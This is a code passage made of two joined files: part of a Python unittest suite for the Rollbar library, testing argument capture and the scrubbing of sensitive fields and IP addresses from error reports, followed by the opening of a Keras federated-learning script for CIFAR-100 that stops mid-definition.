@mock.patch('rollbar.send_payload') def test_args_lambda_no_args(self, send_payload): _raise = lambda: foo() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('locals', payload['data']['body']['trace']['frames'][-1]) @mock.patch('rollbar.send_payload') def test_args_lambda_with_args(self, send_payload): _raise = lambda arg1, arg2: foo(arg1, arg2) try: _raise('arg1-value', 'arg2-value') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg1-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) self.assertEqual('arg2', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual('arg2-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg2']) @mock.patch('rollbar.send_payload') def test_args_lambda_with_defaults(self, send_payload): _raise = lambda arg1='default': foo(arg1) try: _raise(arg1='arg1-value') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) # NOTE(cory): Lambdas are a bit strange. We treat default values for lambda args # as positional. self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg1-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) @mock.patch('rollbar.send_payload') def test_args_lambda_with_star_args(self, send_payload): _raise = lambda *args: foo(arg1) try: _raise('arg1-value') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) varargs = payload['data']['body']['trace']['frames'][-1]['varargspec'] self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['locals'][varargs])) self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals'][varargs][0], r'\*+') @mock.patch('rollbar.send_payload') def test_args_lambda_with_star_args_and_args(self, send_payload): _raise = lambda arg1, *args: foo(arg1) try: _raise('arg1-value', 1, 2) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) varargs = payload['data']['body']['trace']['frames'][-1]['varargspec'] self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg1-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][varargs])) self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals'][varargs][0], r'\*+') self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals'][varargs][1], r'\*+') @mock.patch('rollbar.send_payload') def test_args_lambda_with_kwargs(self, send_payload): _raise = lambda **kwargs: foo(arg1) try: _raise(arg1='arg1-value', arg2=2) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) keywords = payload['data']['body']['trace']['frames'][-1]['keywordspec'] self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][keywords])) self.assertEqual('arg1-value', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg1']) self.assertEqual(2, payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg2']) @mock.patch('rollbar.send_payload') def test_args_lambda_with_kwargs_and_args(self, send_payload): _raise = lambda arg1, arg2, **kwargs: foo(arg1) try: _raise('a1', 'a2', arg3='arg3-value', arg4=2) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) keywords = payload['data']['body']['trace']['frames'][-1]['keywordspec'] self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg2', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual('a1', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) self.assertEqual('a2', payload['data']['body']['trace']['frames'][-1]['locals']['arg2']) self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][keywords])) self.assertEqual('arg3-value', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg3']) self.assertEqual(2, payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg4']) @mock.patch('rollbar.send_payload') def test_args_lambda_with_kwargs_and_args_and_defaults(self, send_payload): _raise = lambda arg1, arg2, arg3='default-value', **kwargs: foo(arg1) try: _raise('a1', 'a2', arg3='arg3-value', arg4=2) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) keywords = payload['data']['body']['trace']['frames'][-1]['keywordspec'] # NOTE(cory): again, default values are strange for lambdas and we include them as # positional args. self.assertEqual(3, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg2', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual('arg3', payload['data']['body']['trace']['frames'][-1]['argspec'][2]) self.assertEqual('a1', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) self.assertEqual('a2', payload['data']['body']['trace']['frames'][-1]['locals']['arg2']) self.assertEqual('arg3-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg3']) self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['locals'][keywords])) self.assertEqual(2, payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg4']) @mock.patch('rollbar.send_payload') def test_args_generators(self, send_payload): def _raise(arg1): for i in range(2): if i > 0: raise Exception() else: yield i try: l = list(_raise('hello world')) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('hello world', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) @mock.patch('rollbar.send_payload') def test_anonymous_tuple_args(self, send_payload): # Only run this test on Python versions that support it if not _anonymous_tuple_func: return try: _anonymous_tuple_func((1, (2, 3), 4)) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(4, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual(1, payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual(2, payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual(3, payload['data']['body']['trace']['frames'][-1]['argspec'][2]) self.assertEqual(4, payload['data']['body']['trace']['frames'][-1]['argspec'][3]) self.assertEqual(10, payload['data']['body']['trace']['frames'][-1]['locals']['ret']) @mock.patch('rollbar.send_payload') def test_scrub_defaults(self, send_payload): def _raise(password='sensitive', clear='text'): headers = { 'Authorization': 'bearer 123' } raise Exception() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('kwargs', payload['data']['body']['trace']['frames'][-1]['locals']) self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('password', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals']['password'], r'\*+') self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals']['headers']['Authorization'], r'\*+') self.assertEqual('clear', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual('text', payload['data']['body']['trace']['frames'][-1]['locals']['clear']) @mock.patch('rollbar.send_payload') def test_dont_scrub_star_args(self, send_payload): rollbar.SETTINGS['locals']['scrub_varargs'] = False def _raise(*args): raise Exception() try: _raise('sensitive', 'text') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('locals', payload['data']['body']['trace']['frames'][-1]) varargspec = payload['data']['body']['trace']['frames'][-1]['varargspec'] self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][varargspec])) self.assertEqual(payload['data']['body']['trace']['frames'][-1]['locals'][varargspec][0], 'sensitive') self.assertEqual(payload['data']['body']['trace']['frames'][-1]['locals'][varargspec][1], 'text') @mock.patch('rollbar.send_payload') def test_scrub_kwargs(self, send_payload): def _raise(**kwargs): raise Exception() try: _raise(password='sensitive', clear='text') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) keywords = payload['data']['body']['trace']['frames'][-1]['keywordspec'] self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][keywords])) self.assertIn('password', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]) self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['password'], r'\*+') self.assertIn('clear', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]) self.assertEqual('text', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['clear']) @mock.patch('rollbar.send_payload') def test_scrub_locals(self, send_payload): invalid_b64 = b'CuX2JKuXuLVtJ6l1s7DeeQ==' invalid = base64.b64decode(invalid_b64) def _raise(): # Make sure that the _invalid local variable makes its # way into the payload even if its value cannot be serialized # properly. _invalid = invalid # Make sure the Password field gets scrubbed even though its # original value could not be serialized properly. Password = invalid password = 'sensitive' raise Exception((_invalid, Password, password)) try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals']['password'], r'\*+') self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals']['Password'], r'\*+') self.assertIn('_invalid', payload['data']['body']['trace']['frames'][-1]['locals']) binary_type_name = 'str' if python_major_version() < 3 else 'bytes' undecodable_message = '<Undecodable type:(%s) base64:(%s)>' % (binary_type_name, base64.b64encode(invalid).decode('ascii')) self.assertEqual(undecodable_message, payload['data']['body']['trace']['frames'][-1]['locals']['_invalid']) @mock.patch('rollbar.send_payload') def test_scrub_nans(self, send_payload): def _raise(): infinity = float('Inf') negative_infinity = float('-Inf') not_a_number = float('NaN') raise Exception() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual('<Infinity>', payload['data']['body']['trace']['frames'][-1]['locals']['infinity']) self.assertEqual('<NegativeInfinity>', payload['data']['body']['trace']['frames'][-1]['locals']['negative_infinity']) self.assertEqual('<NaN>', payload['data']['body']['trace']['frames'][-1]['locals']['not_a_number']) @mock.patch('rollbar.send_payload') def test_scrub_self_referencing(self, send_payload): def _raise(obj): raise Exception() try: obj = {'x': 42.3} obj['child'] = { 'parent': obj } # NOTE(cory): We copy the dict here so that we don't produce a circular reference # from the _rase() args. _raise(dict(obj)) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertTrue( (isinstance(payload['data']['body']['trace']['frames'][-1]['locals']['obj'], dict) and 'child' in payload['data']['body']['trace']['frames'][-1]['locals']['obj']) or (isinstance(payload['data']['body']['trace']['frames'][-1]['locals']['obj'], string_types) and payload['data']['body']['trace']['frames'][-1]['locals']['obj'].startswith('<CircularReference')) ) self.assertTrue( (isinstance(payload['data']['body']['trace']['frames'][-1]['locals']['obj'], dict) and 'x' in payload['data']['body']['trace']['frames'][-1]['locals']['obj'] and payload['data']['body']['trace']['frames'][-1]['locals']['obj']['x'] == 42.3) or (isinstance(payload['data']['body']['trace']['frames'][-1]['locals']['obj'], string_types) and payload['data']['body']['trace']['frames'][-1]['locals']['obj'].startswith('<CircularReference')) ) @mock.patch('rollbar.send_payload') def test_scrub_local_ref(self, send_payload): """ NOTE(cory): This test checks to make sure that we do not scrub a local variable that is a reference to a parameter that is scrubbed. Ideally we would be able to scrub 'copy' as well since we know that it has the same value as a field that was scrubbed. """ def _raise(password='sensitive'): copy = password raise Exception() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual('sensitive', payload['data']['body']['trace']['frames'][-1]['locals']['copy']) @mock.patch('rollbar.send_payload') def test_large_arg_val(self, send_payload): def _raise(large): raise Exception() try: large = ''.join(['#'] * 200) _raise(large) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('large', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual("'###############################################...################################################'", payload['data']['body']['trace']['frames'][-1]['locals']['large']) @mock.patch('rollbar.send_payload') def test_long_list_arg_val(self, send_payload): def _raise(large): raise Exception() try: xlarge = ['hi' for _ in range(30)] # NOTE(cory): We copy the list here so that the local variables from # this frame are not referenced directly by the frame from _raise() # call above. If we didn't copy this list, Rollbar would report a # circular reference for the args on _raise(). _raise([str(x) for x in xlarge]) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('large', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertTrue( ("['hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', ...]" == payload['data']['body']['trace']['frames'][-1]['argspec'][0]) or ("['hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', 'hi', ...]" == payload['data']['body']['trace']['frames'][0]['locals']['xlarge'])) @mock.patch('rollbar.send_payload') def test_last_frame_has_locals(self, send_payload): def _raise(): some_var = 'some value' raise Exception() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('locals', payload['data']['body']['trace']['frames'][-1]) self.assertIn('some_var', payload['data']['body']['trace']['frames'][-1]['locals']) self.assertEqual("some value", payload['data']['body']['trace']['frames'][-1]['locals']['some_var']) @mock.patch('rollbar.send_payload') def test_all_project_frames_have_locals(self, send_payload): prev_root = rollbar.SETTINGS['root'] rollbar.SETTINGS['root'] = __file__.rstrip('pyc') try: step1() except: rollbar.report_exc_info() finally: rollbar.SETTINGS['root'] = prev_root self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] for frame in payload['data']['body']['trace']['frames']: self.assertIn('locals', frame) @mock.patch('rollbar.send_payload') def test_only_last_frame_has_locals(self, send_payload): prev_root = rollbar.SETTINGS['root'] rollbar.SETTINGS['root'] = 'dummy' try: step1() except: rollbar.report_exc_info() finally: rollbar.SETTINGS['root'] = prev_root self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] num_frames = len(payload['data']['body']['trace']['frames']) for i, frame in enumerate(payload['data']['body']['trace']['frames']): if i < num_frames - 1: self.assertNotIn('locals', frame) else: self.assertIn('locals', frame) @mock.patch('rollbar.send_payload') def test_modify_arg(self, send_payload): # Record locals for all frames prev_root = rollbar.SETTINGS['root'] rollbar.SETTINGS['root'] = __file__.rstrip('pyc') try: called_with('original value') except: rollbar.report_exc_info() finally: rollbar.SETTINGS['root'] = prev_root self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] frames = payload['data']['body']['trace']['frames'] called_with_frame = frames[1] self.assertEqual('arg1', called_with_frame['argspec'][0]) self.assertEqual('changed', called_with_frame['locals']['arg1']) @mock.patch('rollbar.send_payload') def test_unicode_exc_info(self, send_payload): message = '\u221a' try: raise Exception(message) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['body']['trace']['exception']['message'], message) @mock.patch('rollbar.lib.transport.post', side_effect=lambda *args, **kw: MockResponse({'status': 'OK'}, 200)) def test_serialize_and_send_payload(self, post=None): invalid_b64 = b'CuX2JKuXuLVtJ6l1s7DeeQ==' invalid = base64.b64decode(invalid_b64) def _raise(): # Make sure that the _invalid local variable makes its # way into the payload even if its value cannot be serialized # properly. _invalid = invalid # Make sure the Password field gets scrubbed even though its # original value could not be serialized properly. Password = invalid password = 'sensitive' raise Exception('bug bug') try: _raise() except: rollbar.report_exc_info() self.assertEqual(post.called, True) payload_data = post.call_args[1]['data'] self.assertIsInstance(payload_data, str) self.assertIn('bug bug', payload_data) try: post.call_args[1]['data'] except: self.assertTrue(False) def test_scrub_webob_request_data(self): rollbar._initialized = False rollbar.init(_test_access_token, locals={'enabled': True}, dummy_key='asdf', handler='blocking', timeout=12345, scrub_fields=rollbar.SETTINGS['scrub_fields'] + ['token', 'secret', 'cookies', 'authorization']) import webob request = webob.Request.blank('/the/path?q=hello&password=hunter2', base_url='http://example.com', headers={ 'X-Real-Ip': '5.6.7.8', 'Cookies': 'name=value; password=hash;', 'Authorization': 'I am from NSA' }, POST='foo=bar&confirm_password=hunter3&token=secret') unscrubbed = rollbar._build_webob_request_data(request) self.assertEqual(unscrubbed['url'], 'http://example.com/the/path?q=hello&password=hunter2') self.assertEqual(unscrubbed['user_ip'], '5.6.7.8') self.assertDictEqual(unscrubbed['GET'], {'q': 'hello', 'password': 'hunter2'}) self.assertDictEqual(unscrubbed['POST'], {'foo': 'bar', 'confirm_password': 'hunter3', 'token': 'secret'}) self.assertEqual('5.6.7.8', unscrubbed['headers']['X-Real-Ip']) self.assertEqual('name=value; password=hash;', unscrubbed['headers']['Cookies']) self.assertEqual('I am from NSA', unscrubbed['headers']['Authorization']) scrubbed = rollbar._transform(unscrubbed) self.assertRegex(scrubbed['url'], r'http://example.com/the/path\?(q=hello&password=-+)|(password=-+&q=hello)') self.assertEqual(scrubbed['GET']['q'], 'hello') self.assertRegex(scrubbed['GET']['password'], r'\*+') self.assertEqual(scrubbed['POST']['foo'], 'bar') self.assertRegex(scrubbed['POST']['confirm_password'], r'\*+') self.assertRegex(scrubbed['POST']['token'], r'\*+') self.assertEqual('5.6.7.8', scrubbed['headers']['X-Real-Ip']) self.assertRegex(scrubbed['headers']['Cookies'], r'\*+') self.assertRegex(scrubbed['headers']['Authorization'], r'\*+') def test_filter_ip_no_user_ip(self): request_data = {'something': 'but no ip'} rollbar._filter_ip(request_data, False) self.assertNotIn('user_ip', request_data) def test_filter_ip_capture_true(self): ip = '123.32.394.99' request_data = {'user_ip': ip} rollbar._filter_ip(request_data, True) self.assertEqual(ip, request_data['user_ip']) def test_filter_ip_anonymize(self): ip = '123.32.394.99' request_data = {'user_ip': ip} rollbar._filter_ip(request_data, rollbar.ANONYMIZE) self.assertNotEqual(ip, request_data['user_ip']) self.assertNotEqual(None, request_data['user_ip']) def test_filter_ip_capture_false(self): ip = '123.32.394.99' request_data = {'user_ip': ip} rollbar._filter_ip(request_data, False) self.assertNotEqual(ip, request_data['user_ip']) self.assertEqual(None, request_data['user_ip']) def test_filter_ip_ipv6_capture_false(self): ip = '2607:f0d0:1002:51::4' request_data = {'user_ip': ip} rollbar._filter_ip(request_data, False) self.assertNotEqual(ip, request_data['user_ip']) self.assertEqual(None, request_data['user_ip']) def test_filter_ip_anonymize_ipv6(self): ips = [ 'FE80:0000:0000:0000:0202:B3FF:FE1E:8329', 'FE80::0202:B3FF:FE1E:8329', '2607:f0d0:1002:51::4', ] for ip in ips: request_data = {'user_ip': ip} rollbar._filter_ip(request_data, rollbar.ANONYMIZE) self.assertNotEqual(ip, request_data['user_ip']) self.assertNotEqual(None, request_data['user_ip']) def test_starlette_extract_user_ip_from_client_host(self): try: from starlette.requests import Request except ImportError: self.skipTest('Requires Starlette package') client_host = ('127.0.0.1', 1453) ip_forwarded_for = b'192.168.10.10' ip_real_ip = b'1.2.3.4' scope = { 'type': 'http', 'client': client_host, 'headers': [ (b'x-forwarded-for', ip_forwarded_for), (b'x-real-ip', ip_real_ip), ], } request = Request(scope) user_ip = rollbar._starlette_extract_user_ip(request) self.assertEqual(user_ip, client_host[0]) def test_starlette_extract_user_ip_from_headers(self): try: from starlette.requests import Request except ImportError: self.skipTest('Requires Starlette package') ip_forwarded_for = b'192.168.10.10' ip_real_ip = b'1.2.3.4' # Headers contain only X-Forwarded-For scope = {'type': 'http', 'headers': [(b'x-forwarded-for', ip_forwarded_for)]} request = Request(scope) user_ip = rollbar._starlette_extract_user_ip(request) self.assertEqual(user_ip, ip_forwarded_for.decode()) # Headers contain only X-Real-Ip scope = {'type': 'http', 'headers': [(b'x-real-ip', ip_real_ip)]} request = Request(scope) user_ip = rollbar._starlette_extract_user_ip(request) self.assertEqual(user_ip, ip_real_ip.decode()) # Headers contain both X-Forwarded-For and X-Real-Ip scope = { 'type': 'http', 'headers': [ (b'x-forwarded-for', ip_forwarded_for), (b'x-real-ip', ip_real_ip), ], } request = Request(scope) user_ip = rollbar._starlette_extract_user_ip(request) self.assertEqual(user_ip, ip_forwarded_for.decode()) ### Helpers def step1(): val1 = 1 step2() def step2(): val2 = 2 raise Exception() def called_with(arg1): arg1 = 'changed' step1() class CauseException(Exception): pass class MockResponse: def __init__(self, json_data, status_code): self.json_data = json_data self.status_code = status_code @property def content(self): return json.dumps(self.json_data) def json(self): return self.json_data class MockRawResponse: def __init__(self, data, status_code): self.data = data self.status_code = status_code @property def content(self): return self.data def json(self): return self.data class MockLambdaContext(object): def __init__(self, x): self.function_name = 1 self.function_version = 2 self.invoked_function_arn = 3 self.aws_request_id = 4 self.x = x def get_remaining_time_in_millis(self): 42 def fastapi_add_route_with_request_param(app, endpoint, path, request_param): from fastapi import Request endpoint.__annotations__[request_param] = Request return app.get(path)(endpoint) if __name__ == '__main__': unittest.main()
federated_learning_keras_PS_threads_CIFAR100.py
from DataSets import CIFARData from DataSets_task import CIFARData_task from consensus.consensus_v2 import CFA_process from consensus.parameter_server import Parameter_Server # best use with PS active # from ReplayMemory import ReplayMemory import numpy as np import os import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers from tensorflow.keras import models import argparse import warnings import glob import datetime import scipy.io as sio # import multiprocessing import threading import math from matplotlib.pyplot import pause import time warnings.filterwarnings("ignore") parser = argparse.ArgumentParser() parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float) parser.add_argument('-PS', default=1, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float) parser.add_argument('-consensus', default=0, help="set 1 to enable consensus, set 0 to disable", type=float) parser.add_argument('-mu', default=0.01, help="sets the learning rate for all setups", type=float) parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float) parser.add_argument('-target', default=0.5, help="sets the target loss to stop federation", type=float) parser.add_argument('-K', default=30, help="sets the number of network devices", type=int) parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int) parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int) parser.add_argument('-samp', default=500, help="sets the number samples per device", type=int) parser.add_argument('-noniid_assignment', default=1, help=" set 0 for iid assignment, 1 for non-iid random", type=int) parser.add_argument('-run', default=0, help=" set the run id", type=int) parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int) parser.add_argument('-batches', default=5, help="sets the number of batches per learning round", type=int) parser.add_argument('-batch_size', default=100, help="sets the batch size per learning round", type=int) parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int) parser.add_argument('-modelselection', default=0, help="sets the model: 0 for vgg-1", type=int) args = parser.parse_args() devices = args.K # NUMBER OF DEVICES active_devices_per_round = args.Ka n_outputs = 100 # 6 classes max_epochs = 1000 validation_train = 50000 # VALIDATION and training DATASET size validation_test = 10000 condition = args.modelselection # set an arbitrary optimizer, here Adam is used optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0) # optimizer = keras.optimizers.SGD(learning_rate=args.mu, momentum=0.9) if args.consensus == 1: federated = True parameter_server = False elif args.PS == 1: federated = False parameter_server = True else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER) federated = False parameter_server = False if active_devices_per_round > devices: active_devices_per_round = devices target_loss = args.target # Configuration paramaters for the whole setup seed = 42 # batch_size = 5 # Size of batch taken from replay buffer batch_size = args.batch_size number_of_batches = args.batches training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE if (training_set_per_device > validation_train/args.K): training_set_per_device = math.floor(validation_train/args.K) print(training_set_per_device) if batch_size > training_set_per_device: batch_size = training_set_per_device # if batch_size*number_of_batches > training_set_per_device: # number_of_batches = math.floor(training_set_per_device/batch_size) # number_of_batches = int(training_set_per_device/batch_size) # number_of_batches = args.batches number_of_batches_for_validation = int(validation_test/batch_size) print("Number of batches for learning {}".format(number_of_batches)) max_lag = number_of_batches*2 # consensus max delay 2= 2 epochs max refresh_server = 1 # refresh server updates (in sec) validation_start = 1 # start validation in epochs # Using huber loss for stability loss_function = keras.losses.Huber() # tf.keras.regularizers.l2(l2=0.01, **kwargs) # def get_noniid_data(total_training_size, devices, batch_size): # samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1), # devices) # create random numbers # samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals # # Ignore the following if you don't need integers # samples = np.round(samples) # transform them into integers # remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done # step = 1 if remainings > 0 else -1 # while remainings != 0: # i = np.random.randint(devices) # if samples[i] + step >= 0: # samples[i] += step # remainings -= step # return samples #### def preprocess_observation(obs, batch_size): img = obs# crop and downsize img = (img).astype(np.float) return img.reshape(batch_size, 32, 32, 3) def create_q_model(): # Network defined by the Deepmind paper inputs = layers.Input(shape=(32, 32, 3,)) if condition == 0: # VGG 1 BLOCK layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(inputs) layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(layer1) layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2) layer4 = layers.Flatten()(layer3) layer5 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer4) classification = layers.Dense(n_outputs, activation="linear")(layer5) elif condition == 1: # VGG 2 BLOCK layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( inputs) layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))( layer1) layer3 = 